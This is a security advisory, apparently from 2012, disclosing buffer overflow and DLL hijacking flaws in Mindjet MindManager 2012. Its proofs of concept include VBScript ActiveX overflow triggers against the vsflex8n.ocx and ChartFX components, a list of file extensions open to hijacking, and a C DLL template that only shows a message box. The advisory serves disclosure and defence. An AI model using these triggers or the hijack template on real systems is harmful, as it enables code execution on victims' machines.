Mindjet MindManager 2012 v10.0.493 Multiple Remote Vulnerabilities


Vendor: Mindjet
Product web page: http://www.mindjet.com
Affected version: 10.0.493 (Windows)

Summary: An intuitive visual framework that fosters clarity,
innovative thinking & communication to improve business results.

Desc: MindManager suffers from several vulnerabilities included
into the whole package. Several OCX and DLL libraries from 3rd
party software (glg.ocx, officeviewermme.ocx, pdfxctrl.dll, vsflex8n.ocx
and ChartFX.ClientServer.Core.dll) are vulnerable to buffer overflow
and denial of service (IE). Also the application is vulnerable to insecure
library loading with every file extension thru ssgp.dll and dwmapi.dll.

Tested on Microsoft Windows XP Professional SP3 (EN)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2012-5068
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5068.php


Other vulnerabilities:

http://www.exploit-db.com/exploits/12673/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php


25.01.2012

---


<object classid='clsid:74233DB3-F72F-44EA-94DC-258A624037E6' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Mindjet\MindManager 10\vsflex8n.ocx"
prototype  = "Sub Archive ( ByVal ArcFileName As String ,  ByVal FileName As String ,  ByVal Action As ArchiveSettings )"
memberName = "Archive"
progid     = "VSFlex8N.VSFlexGrid"
argCount   = 3

arg1=String(7188, "A")
arg2="defaultV"
arg3=1

target.Archive arg1 ,arg2 ,arg3 

</script>

############

CompanyName    ComponentOne
FileDescription    VSFlexGrid8 (UNICODE)
FileVersion    8, 0, 20031, 172
InternalName    
LegalCopyright    Copyright 1999, 2002 ComponentOne
OriginalFileName    VSFlex8u.OCX
ProductName    VSFlexGrid8
ProductVersion    8, 0, 20031, 172

Report for Clsid: {74233DB3-F72F-44EA-94DC-258A624037E6}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  

############

------------------------------


<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Mindjet\MindManager 10\ChartFX.ClientServer.Core.dll"
prototype  = "Property Let TipMask As String"
memberName = "TipMask"
progid     = "Cfx62ClientServer.Chart"
argCount   = 1

'arg1=String(13332, "A")
target.TipMask = arg1

</script>


############

CompanyName    Software FX, Inc.
FileDescription    ChartFX Client Server
FileVersion    6.2.2089.27167
InternalName    ChartFX.ClientServer.Core.dll
LegalCopyright    Copyright 1993-2005 Software FX, Inc.
OriginalFileName    ChartFX.ClientServer.Core.dll
ProductName    ChartFX Client Server
ProductVersion    6.2

Report for Clsid: {E9DF30CA-4B30-4235-BF0C-7150F646606C}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  



Vulnerable members
--------------------
Function HitTestEx (
   ByVal X  As Long , 
   ByVal Y  As Long 
)  As _MouseEventArgsX

# vuln var: Y, X

-------------------------------------------
Sub OpenData (
   ByVal COD As COD , 
   ByVal n1  As Long , 
   ByVal n2  As Long 
)

# vuln var: n1, n2

-------------------------------------------
Sub ShowPropertiesDialog (
   ByVal context  As Variant , 
   ByVal pageNumber  As Long 
)

# vuln var: pagenumber

-------------------------------------------

############

------------------------------

DLL Hijack:

Vulnerable extensions:
- .mmap
- .xmmap
- .xml
- .mmp
- .mmat
- .xmmat
- .mmpt
- .mmmp
- .xmmmp
- .mmas
- .xmmas
- .docx
- .dotx
- .doc
- .dot
- .mpx

(ssgp.dll / dwmapi.dll)

---

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

  switch (fdwReason)
  {
    case DLL_PROCESS_ATTACH:
    dll_mll();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
  }

  return TRUE;
}

int dll_mll()
{
  MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

------------------------------